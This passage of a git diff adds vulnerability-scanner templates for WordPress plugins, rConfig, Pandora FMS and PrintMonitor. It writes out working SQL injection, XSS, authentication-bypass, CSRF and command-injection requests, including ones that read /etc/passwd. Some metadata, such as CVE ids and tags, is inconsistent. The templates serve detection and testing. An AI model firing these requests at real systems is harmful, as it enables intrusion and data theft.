diff --git a/helpers/payloads/wp-social-warfare-rce.txt b/helpers/payloads/wp-social-warfare-rce.txt new file mode 100644 index 0000000000..b0b0564f84 --- /dev/null +++ b/helpers/payloads/wp-social-warfare-rce.txt @@ -0,0 +1 @@ +
system('cat /etc/passwd')
diff --git a/http/cves/2015/CVE-2015-20067.yaml b/http/cves/2015/CVE-2015-20067.yaml new file mode 100644 index 0000000000..10fae655b1 --- /dev/null +++ b/http/cves/2015/CVE-2015-20067.yaml @@ -0,0 +1,40 @@ +id: CVE-2015-20067 + +info: + name: WP Attachment Export < 0.2.4 - Unrestricted File Download + author: r3Y3r53 + severity: high + description: | + The plugin does not have proper access controls, allowing unauthenticated users to download the XML data that holds all the details of attachments/posts on a Wordpress + powered site. This includes details of even privately published posts and password protected posts with their passwords revealed in plain text. + remediation: Fixed in 0.2.4 + reference: + - https://wpscan.com/vulnerability/d1a9ed65-baf3-4c85-b077-1f37d8c7793a + - https://packetstormsecurity.com/files/132693/ + - https://seclists.org/fulldisclosure/2015/Jul/73 + - https://nvd.nist.gov/vuln/detail/CVE-2015-20067 + classification: + cve-id: CVE-2015-20067 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: 862 + metadata: + max-request: 2 + verified: true + google-query: inurl:"/wp-content/plugins/wp-attachment-export/" + tags: cve,cve2015,wordpress,wp,wp-plugin,unauth,wp-attachment-export,wpscan + +http: + - method: GET + path: + - "{{BaseURL}}/wp-admin/tools.php?content=attachment&wp-attachment-export-download=true" + - "{{BaseURL}}/wp-admin/tools.php?content=&wp-attachment-export-download=true" + + stop-at-first-match: true + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(header, "text/xml")' + - 'contains_all(body, "title","wp:author_id","wp:author_email")' + condition: and diff --git a/http/cves/2018/CVE-2018-7282.yaml b/http/cves/2018/CVE-2018-7282.yaml new file mode 100644 index 0000000000..47987b4ab7 --- /dev/null +++ b/http/cves/2018/CVE-2018-7282.yaml @@ -0,0 +1,48 @@ +id: CVE-2018-7282 + +info: + name: TITool PrintMonitor - Blind SQL Injection + author: theamanrawat + severity: critical + description: | + The username parameter of the TITool PrintMonitor solution during the login request is vulnerable to and/or time-based blind SQLi. + remediation: Upgrade to PM18.2.1. + reference: + - https://fenceposterror.github.io/cve-2018-7282.txt + - https://nvd.nist.gov/vuln/detail/CVE-2018-7282 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2018-7282 + cwe-id: CWE-89 + cpe: cpe:2.3:a:titool:printmonitor:*:*:*:*:*:*:*:* + metadata: + verified: "true" + shodan-query: title:"PrintMonitor" + max-request: 1 + vendor: titool + product": printmonitor + tags: cve,cve2018,sqli,printmonitor,unauth + +variables: + username: "{{rand_base(6)}}" + password: "{{rand_base(8)}}" + +http: + - raw: + - | + @timeout: 20s + POST /login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}')+OR+4191=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(50000000/2))))--+vDwl&password={{password}}&language=en + + host-redirects: true + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 200' + - 'contains(body, "PrintMonitor") && contains(header, "text/html")' + condition: and diff --git a/http/cves/2019/CVE-2019-15829.yaml b/http/cves/2019/CVE-2019-15829.yaml new file mode 100644 index 0000000000..bfd21878b7 --- /dev/null +++ b/http/cves/2019/CVE-2019-15829.yaml @@ -0,0 +1,44 @@ +id: CVE-2019-15829 + +info: + name: Gallery Photoblocks < 1.1.43 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The Gallery PhotoBlocks WordPress plugin was affected by an Authenticated Reflected XSS security vulnerability. + remediation: Fixed in 1.1.43 + reference: + - https://wpscan.com/vulnerability/b8d1d88e-f2e5-4212-af34-c91f563f07b6/ + - https://nvd.nist.gov/vuln/detail/CVE-2019-15829 + - https://wordpress.org/plugins/photoblocks-grid-gallery/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cwe-id: CWE-79 + metadata: + max-request: 2 + verified: true + publicwww-query: "/wp-content/plugins/photoblocks-grid-gallery/" + tags: cve,cve2023,wp,wordpress,wp-plugin,photoblocks-gallery,xss,authenticated,wpscan + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/admin.php?page=photoblocks-edit&id=%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(body_2, "")' + - 'contains(body_2, "post galleries!")' + condition: and diff --git a/http/cves/2020/CVE-2020-10220.yaml b/http/cves/2020/CVE-2020-10220.yaml index aa38a9a787..c2f2b241db 100644 --- a/http/cves/2020/CVE-2020-10220.yaml +++ b/http/cves/2020/CVE-2020-10220.yaml @@ -1,8 +1,8 @@ id: CVE-2020-10220 info: - name: rConfig 3.9 - SQL injection - author: ritikchaddha + name: rConfig 3.9 - SQL Injection + author: ritikchaddha,theamanrawat severity: critical description: | An issue was discovered in rConfig through 3.9.4. The web interface is prone to a SQL injection via the commands.inc.php searchColumn parameter. @@ -29,21 +29,21 @@ info: product: rconfig shodan-query: title:"rConfig" tags: packetstorm,cve,cve2020,rconfig,sqli + variables: num: "999999999" http: - - raw: - - | - GET /commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5({{num}}),0x5B50574E5D3C42523E)%20limit%200,1),NULL-- HTTP/1.1 - Host: {{Hostname}} + - method: GET + path: + - "{{BaseURL}}/commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5('{{num}}'),0x5B50574E5D3C42523E)%20limit%200,1),NULL--" matchers-condition: and matchers: - type: word part: body words: - - '{{md5({{num}})}}' + - "{{md5(num)}}" - type: status status: diff --git a/http/cves/2020/CVE-2020-12256.yaml b/http/cves/2020/CVE-2020-12256.yaml new file mode 100644 index 0000000000..d97268ad1a --- /dev/null +++ b/http/cves/2020/CVE-2020-12256.yaml @@ -0,0 +1,48 @@ +id: CVE-2020-12256 +info: + name: rConfig 3.9.4 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The rConfig 3.9.4 is vulnerable to cross-site scripting. The devicemgmnt.php file improperly validates the request coming from the user input. Due to this flaw, An attacker can exploit this vulnerability by crafting arbitrary javascript in `deviceId` GET parameter of devicemgmnt.php resulting in execution of the javascript. + reference: + - https://www.rconfig.com/downloads/rconfig-3.9.4.zip + - https://gist.github.com/farid007/8855031bad0e497264e4879efb5bc9f8 + - https://nvd.nist.gov/vuln/detail/CVE-2020-12256 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2020-12256 + cwe-id: CWE-79 + metadata: + verified: "true" + shodan-query: http.title:"rConfig" + max-request: 1 + tags: cve,cve2020,rconfig,authenticated,xss + +http: + - raw: + - | + GET /login.php HTTP/1.1 + Host: {{Hostname}} + + - | + POST /lib/crud/userprocess.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + user={{username}}&pass={{password}}&sublogin=1 + + - | + GET /devicemgmt.php?deviceId="> HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + host-redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(body_3, "") && contains(body_3, "rConfig - Configuration Management")' + - 'contains(content_type_3, "text/html")' + condition: and diff --git a/http/cves/2020/CVE-2020-12259.yaml b/http/cves/2020/CVE-2020-12259.yaml new file mode 100644 index 0000000000..7dd547691a --- /dev/null +++ b/http/cves/2020/CVE-2020-12259.yaml @@ -0,0 +1,48 @@ +id: CVE-2020-12259 +info: + name: rConfig 3.9.4 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + rConfig 3.9.4 is vulnerable to reflected XSS. The configDevice.php file improperly validates user input. An attacker can exploit this vulnerability by crafting arbitrary JavaScript in the rid GET parameter of devicemgmnt.php + reference: + - https://www.rconfig.com/downloads/rconfig-3.9.4.zip + - https://gist.github.com/farid007/8855031bad0e497264e4879efb5bc9f8 + - https://nvd.nist.gov/vuln/detail/CVE-2020-12259 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2020-12259 + cwe-id: CWE-79 + metadata: + verified: "true" + shodan-query: http.title:"rConfig" + max-request: 1 + tags: cve,cve2020,rconfig,authenticated,xss + +http: + - raw: + - | + GET /login.php HTTP/1.1 + Host: {{Hostname}} + + - | + POST /lib/crud/userprocess.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + user={{username}}&pass={{password}}&sublogin=1 + + - | + GET /configDevice.php?rid="> HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + host-redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(body_3, "") && contains(body_3, "rConfig - Configuration Management")' + - 'contains(content_type_3, "text/html")' + condition: and diff --git a/http/cves/2020/CVE-2020-13638.yaml b/http/cves/2020/CVE-2020-13638.yaml new file mode 100644 index 0000000000..50159232be --- /dev/null +++ b/http/cves/2020/CVE-2020-13638.yaml @@ -0,0 +1,95 @@ +id: CVE-2020-13638 + +info: + name: rConfig 3.9 - Authentication Bypass(Admin Login) + author: theamanrawat + severity: critical + description: | + lib/crud/userprocess.php in rConfig 3.9.x before 3.9.7 has an authentication bypass, leading to administrator account creation. This issue has been fixed in 3.9.7. + reference: + - https://www.rconfig.com/downloads/rconfig-3.9.4.zip + - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-13638 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-13638 + cwe-id: CWE-89 + metadata: + verified: true + shodan-query: http.title:"rConfig" + tags: cve,cve2020,rconfig,auth-bypass + +variables: + username: "{{to_lower(rand_text_alpha(5))}}" + password: "{{rand_text_alphanumeric(12)}}!" + email: "{{rand_base(8)}}@{{rand_base(5)}}.com" + +http: + - raw: + - | + POST /lib/crud/userprocess.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=01b28e152ee044338224bf647275f8eb + + --01b28e152ee044338224bf647275f8eb + Content-Disposition: form-data; name="username" + + {{username}} + --01b28e152ee044338224bf647275f8eb + Content-Disposition: form-data; name="passconf" + + {{password}} + --01b28e152ee044338224bf647275f8eb + Content-Disposition: form-data; name="password" + + {{password}} + --01b28e152ee044338224bf647275f8eb + Content-Disposition: form-data; name="email" + + {{email}} + --01b28e152ee044338224bf647275f8eb + Content-Disposition: form-data; name="editid" + + + --01b28e152ee044338224bf647275f8eb + Content-Disposition: form-data; name="add" + + add + --01b28e152ee044338224bf647275f8eb + Content-Disposition: form-data; name="ulevelid" + + 9 + --01b28e152ee044338224bf647275f8eb-- + + - | + GET /login.php HTTP/1.1 + Host: {{Hostname}} + + - | + POST /lib/crud/userprocess.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + user={{username}}&pass={{password}}&sublogin=1 + + cookie-reuse: true + host-redirects: true + matchers-condition: and + matchers: + - type: word + part: body_3 + words: + - "rConfig - Configuration Management" + - "Logged in as" + - "dashboadFieldSet" + condition: and + + - type: word + part: header_3 + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-13851.yaml b/http/cves/2020/CVE-2020-13851.yaml new file mode 100644 index 0000000000..1ec67577d7 --- /dev/null +++ b/http/cves/2020/CVE-2020-13851.yaml @@ -0,0 +1,46 @@ +id: CVE-2020-13851 + +info: + name: Artica Pandora FMS 7.44 - Remote Code Execution + author: theamanrawat + severity: high + description: | + Artica Pandora FMS 7.44 allows remote command execution via the events feature. + reference: + - https://packetstormsecurity.com/files/158390/Pandora-FMS-7.0-NG-7XX-Remote-Command-Execution.html + - https://nvd.nist.gov/vuln/detail/CVE-2020-13851 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2022-13851 + cwe-id: CWE-78 + metadata: + verified: "true" + shodan-query: title:"Pandora FMS" + max-request: 1 + tags: cve,cve2020,rce,pandora,unauth,artica + +http: + - raw: + - | + POST /pandora_console/ajax.php?page=include/ajax/events&perform_event_response=10000000&target=cat+/etc/passwd&response_id=1 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - 'root:.*:0:0:' + + - type: word + part: header + words: + - "text/html" + - "PHPSESSID=" + condition: and + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-8615.yaml b/http/cves/2020/CVE-2020-8615.yaml new file mode 100644 index 0000000000..1fdb90075c --- /dev/null +++ b/http/cves/2020/CVE-2020-8615.yaml @@ -0,0 +1,56 @@ +id: CVE-2020-8615 + +info: + name: Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery + author: r3Y3r53 + severity: medium + description: | + A CSRF vulnerability in the Tutor LMS plugin before 1.5.3 for WordPress can result in an attacker approving themselves as an instructor and performing other malicious actions (such as blocking legitimate instructors). + remediation: update to v.1.5.3 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2020-8615 + - https://wpscan.com/vulnerability/10058 + - http://packetstormsecurity.com/files/156585/WordPress-Tutor-LMS-1.5.3-Cross-Site-Request-Forgery.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N + cvss-score: 6.5 + cwe-id: CWE-352 + cve-id: CVE-2020-8615 + cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 1 + publicwww-query: "/wp-content/plugins/tutor/" + tags: cve,cve2023,csrf,wp-plugin,wp,tutor,wordpress,wpscan + +variables: + user: "{{rand_base(6)}}" + pass: "{{rand_base(8)}}" + email: "{{randstr}}@{{rand_base(5)}}.com" + firstname: "{{rand_base(5)}}" + lastname: "{{rand_base(5)}}" + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=add_new_instructor&first_name={{firstname}}&last_name={{lastname}}&user_login={{user}}&email={{email}}&phone_number=1231231231&password={{pass}}&password_confirmation={{pass}}&tutor_profile_bio=Et+tempore+culpa+n&action=tutor_add_instructor + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'contains(content_type_2, "application/json")' + - 'contains(body_2, "success") && contains(body_2, "true") && contains(body_2, "Instructor has been added successfully")' + - 'status_code_2 == 200' + condition: and diff --git a/http/cves/2021/CVE-2021-24215.yaml b/http/cves/2021/CVE-2021-24215.yaml new file mode 100644 index 0000000000..50098e6721 --- /dev/null +++ b/http/cves/2021/CVE-2021-24215.yaml @@ -0,0 +1,45 @@ +id: CVE-2021-24215 + +info: + name: Controlled Admin Access WordPress Plugin <= 1.4.0 - Improper Access Control & Privilege Escalation + author: r3Y3r53 + severity: critical + description: | + An Improper Access Control vulnerability was discovered in the plugin. Uncontrolled access to the website customization functionality and global CMS settings, like /wp-admin/customization.php and /wp-admin/options.php, can lead to a complete compromise of the target resource. + remediation: Fixed in version 1.5.2 + reference: + - https://wpscan.com/vulnerability/eec0f29f-a985-4285-8eed-d1855d204a20 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24215 + - https://www.opencve.io/cve/CVE-2021-24215 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cwe-id: CWE-284 + cpe: cpe:2.3:a:wpruby:controlled_admin_access:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 1 + publicwww-query: "/wp-content/plugins/controlled-admin-access/" + tags: cve,cve2021,authenticated,wpscan,wordpress,wp-plugin,wp,controlled-admin-access + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/options.php HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "This page allows direct access to your site settings") && contains(body_2, "Controlled Admin Access")' + condition: and diff --git a/http/cves/2021/CVE-2021-24286.yaml b/http/cves/2021/CVE-2021-24286.yaml new file mode 100644 index 0000000000..630f047ced --- /dev/null +++ b/http/cves/2021/CVE-2021-24286.yaml @@ -0,0 +1,45 @@ +id: CVE-2021-24286 + +info: + name: WordPress Plugin Redirect 404 to Parent 1.3.0 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The settings page of the plugin did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue. + remediation: Fixed in version 1.3.1 + reference: + - https://wpscan.com/vulnerability/b9a535f3-cb0b-46fe-b345-da3462584e27 + - https://www.exploit-db.com/exploits/50350 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24286 + - https://wordpress.org/plugins/redirect-404-to-parent/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cwe-id: CWE-79 + cpe: cpe:2.3:a:mooveagency:redirect_404_to_parent:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 1 + tags: xss,cve,cve2023,wordpress,wpscan,authenticated,exploitdb,wp-plugin + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/options-general.php?page=moove-redirect-settings&tab=%22+style%3Danimation-name%3Arotation+onanimationstart%3D%22alert%28document.domain%29%3B HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "alert%28document.domain%29") && contains(body_2, "Moove redirect 404")' + - 'status_code_2 == 200' + condition: and diff --git a/http/cves/2021/CVE-2021-24627.yaml b/http/cves/2021/CVE-2021-24627.yaml new file mode 100644 index 0000000000..775b0bccbc --- /dev/null +++ b/http/cves/2021/CVE-2021-24627.yaml @@ -0,0 +1,57 @@ +id: CVE-2021-24627 + +info: + name: G Auto-Hyperlink <= 1.0.1 - SQL Injection + author: theamanrawat + severity: high + description: | + The G Auto-Hyperlink WordPress plugin through 1.0.1 does not sanitise or escape an 'id' GET parameter before using it in a SQL statement, to select data to be displayed in the admin dashboard, leading to an authenticated SQL injection + reference: + - https://wordpress.org/plugins/g-auto-hyperlink/ + - https://wpscan.com/vulnerability/c04ea768-150f-41b8-b08c-78d1ae006bbb + - https://nvd.nist.gov/vuln/detail/CVE-2021-24627 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2021-24627 + cwe-id: CWE-89 + metadata: + verified: true + publicwww-query: "/wp-content/plugins/g-auto-hyperlink/" + tags: cve,cve2021,sqli,wpscan,wordpress,wp-plugin,wp,g-auto-hyperlink,authenticated + +variables: + num: 999999999 + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+I + + - | + GET /wp-admin/admin.php?page=g-auto-hyperlink-edit&id=-2198+UNION+ALL+SELECT+NULL%2Cmd5%28{{num}}%29%2Ccurrent_user%28%29%2Ccurrent_user%28%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body_2 + words: + - "c8c605999f3d8352d7bb792cf3fdb25b" + - "Keyword" + - "g-auto-hyperlink-edit" + condition: and + + - type: word + part: header_2 + words: + - "text/html" + + - type: status + status: + - 200 diff --git a/http/cves/2021/CVE-2021-24791.yaml b/http/cves/2021/CVE-2021-24791.yaml new file mode 100644 index 0000000000..d62534c6de --- /dev/null +++ b/http/cves/2021/CVE-2021-24791.yaml @@ -0,0 +1,46 @@ +id: CVE-2021-24791 +info: + name: Header Footer Code Manager < 1.1.14 - Admin+ SQL Injection + author: r3Y3r53 + severity: high + description: | + The Header Footer Code Manager WordPress plugin before 1.1.14 does not validate and escape the "orderby" and "order" request parameters before using them in a SQL statement when viewing the Snippets admin dashboard, leading to SQL injections + remediation: Fixed in version 1.1.14 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-24791 + - https://wpscan.com/vulnerability/d55caa9b-d50f-4c13-bc69-dc475641735f + - https://wordpress.org/plugins/header-footer-code-manager/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2021-24791 + cwe-id: CWE-89 + metadata: + verified: true + max-request: 1 + google-query: inurl:"/wp-content/plugins/wp-custom-pages/" + tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,authenticated,header-footer-code-manager + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + @timeout: 20s + GET /wp-admin/admin.php?page=hfcm-list&orderby=%28SELECT+5619+FROM+%28SELECT%28SLEEP%286%29%29%29uWCv%29&order=DESC HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2,"Add New Snippet")' + condition: and diff --git a/http/cves/2021/CVE-2021-24915.yaml b/http/cves/2021/CVE-2021-24915.yaml new file mode 100644 index 0000000000..e5df14c463 --- /dev/null +++ b/http/cves/2021/CVE-2021-24915.yaml @@ -0,0 +1,53 @@ +id: CVE-2021-24915 + +info: + name: Contest Gallery < 13.1.0.6 - SQL injection + author: r3Y3r53 + severity: critical + description: | + The plugin does not have capability checks and does not sanitise or escape the cg-search-user-name-original parameter before using it in a SQL statement when exporting users from a gallery, which could allow unauthenticated to perform SQL injections attacks, as well as get the list of all users registered on the blog, including their username and email address. + remediation: Fixed in version 13.1.0.6 + reference: + - https://wpscan.com/vulnerability/45ee86a7-1497-4c81-98b8-9a8e5b3d4fac + - https://gist.github.com/tpmiller87/6c05596fe27dd6f69f1aaba4cbb9c917 + - https://wordpress.org/plugins/contest-gallery/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-24915 + cwe-id: CWE-89 + metadata: + max-request: 1 + verified: true + public-query: "/wp-content/plugins/contest-gallery/" + tags: cve,cve2021,wordpress,wp-plugin,wpscan,wp,contest-gallery + +http: + - raw: + - | + POST /wp-admin/admin.php?page=contest-gallery/index.php&users_management=true&option_id=1 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + cg-search-user-name=&cg-search-user-name-original=%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x717a6b7871%2CIFNULL%28CAST%28VERSION%28%29%20AS%20NCHAR%29%2C0x20%29%2C0x716b707871%29%2CNULL--%20-&cg_create_user_data_csv_new_export=true&cg-search-gallery-id-original=&cg-search-gallery-id=&cg_create_user_data_csv=true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'WpUserId' + - 'Username' + - 'Usermail' + condition: and + + - type: word + part: header + words: + - 'text/csv' + - 'filename=' + condition: and + + - type: status + status: + - 200 diff --git a/http/cves/2021/CVE-2021-24979.yaml b/http/cves/2021/CVE-2021-24979.yaml new file mode 100644 index 0000000000..9fac7ddd68 --- /dev/null +++ b/http/cves/2021/CVE-2021-24979.yaml @@ -0,0 +1,45 @@ +id: CVE-2021-24979 + +info: + name: Paid Memberships Pro < 2.6.6 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The Paid Memberships Pro WordPress plugin before 2.6.6 does not escape the s parameter before outputting it back in an attribute in an admin page, leading to a Reflected Cross-Site Scripting + remediation: version 2.6.6 + reference: + - https://wpscan.com/vulnerability/fc011990-4ec1-4553-901d-4ff1f482cb79 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24979 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-24979 + cwe-id: CWE-79 + metadata: + verified: true + publicwww-query: "/wp-content/plugins/paid-memberships-pro/" + max-request: 1 + tags: cve,cve2023,wp,wordpress,wpscan,wp-plugin,xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/admin.php?page=pmpro-discountcodes&s=s"+style=animation-name:rotation+onanimationstart=alert(document.domain)// HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, "style=animation-name:rotation+onanimationstart=alert(document.domain)//")' + - 'contains(body_2, "Paid Memberships Pro - Membership Plugin for WordPress")' + condition: and \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25016.yaml b/http/cves/2021/CVE-2021-25016.yaml index 5adc0f9467..685f6840a7 100644 --- a/http/cves/2021/CVE-2021-25016.yaml +++ b/http/cves/2021/CVE-2021-25016.yaml @@ -12,21 +12,15 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-25016 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25016 classification: + cve-id: CVE-2021-25016 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 - cve-id: CVE-2021-25016 cwe-id: CWE-79 - epss-score: 0.00095 - epss-percentile: 0.39536 - cpe: cpe:2.3:a:premio:chaty:*:*:*:*:*:wordpress:*:* metadata: - verified: true max-request: 2 - vendor: premio - product: chaty - framework: wordpress + verified: true publicwww-query: "/wp-content/plugins/chaty/" - tags: wpscan,cve,cve2021,wordpress,wp-plugin,xss,authenticated,chaty + tags: cve,cve2021,wordpress,wp-plugin,xss,authenticated,chaty http: - raw: @@ -34,14 +28,11 @@ http: POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - log={{username}}&pwd={{password}}&wp-submit=Log+In - | GET /wp-admin/admin.php?page=chaty-contact-form-feed&search=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true - matchers-condition: and matchers: - type: word @@ -58,4 +49,4 @@ http: - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25079.yaml b/http/cves/2021/CVE-2021-25079.yaml new file mode 100644 index 0000000000..f16708649e --- /dev/null +++ b/http/cves/2021/CVE-2021-25079.yaml @@ -0,0 +1,44 @@ +id: CVE-2021-25079 + +info: + name: Contact Form Entries < 1.2.4 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The plugin does not sanitise and escape various parameters, such as form_id, status, end_date, order, orderby and search before outputting them back in the admin page + remediation: Fixed in version 1.1.7 + reference: + - https://wpscan.com/vulnerability/c3d49271-9656-4428-8357-0d1d77b7fc63 + - https://nvd.nist.gov/vuln/detail/CVE-2021-25079 + - https://wordpress.org/plugins/contact-form-entries/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cwe-id: CWE-79 + metadata: + verified: true + max-request: 2 + google-query: inurl:"/wp-content/plugins/contact-form-entries/" + tags: cve,cve2021,wordpress,wp-plugin,wpscan,authenticated,contact-form-entries,xss + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date=onobw%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3Ez2u4g HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - "contains(body_2, '') && contains(body_2, 'contact-form')" + condition: and diff --git a/http/cves/2021/CVE-2021-29006.yaml 